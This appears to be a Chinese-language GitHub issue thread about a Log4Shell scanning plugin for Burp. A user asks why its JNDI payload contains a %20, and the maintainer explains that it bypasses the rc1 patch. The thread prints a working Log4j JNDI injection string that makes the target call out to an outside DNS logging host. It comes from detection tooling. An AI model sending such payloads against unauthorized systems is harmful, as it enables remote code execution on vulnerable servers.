### ISSUE TITLE
payload的test前面有一个空格，导致无法检测漏洞

### ISSUE THREAD

**Issue by 0xWi11** [f0ng/log4j2burpscanner#28]
通过logger++观察到 payload 是 %24{jndi:dns://xxxxxx.ceye.io/%20test}  这种形式，在网站上测试漏洞，我把%20去掉，会有回显，加上%20无回显。
%20是本身的设计？

**Comment by f0ng** [comment]
感谢师傅反馈，%20是为了绕过rc1补丁的payload，据我本地测试应该是不会影响漏洞探测的

**Comment by f0ng** [comment]
`0.17`版本已优化该问题

**Comment by 0xWi11** [comment]
昨天忘记说了，后面发现是ceye的问题。

**Comment by f0ng** [comment]
没事，现在是一个请求包两个payload的数据包，综合一下也行
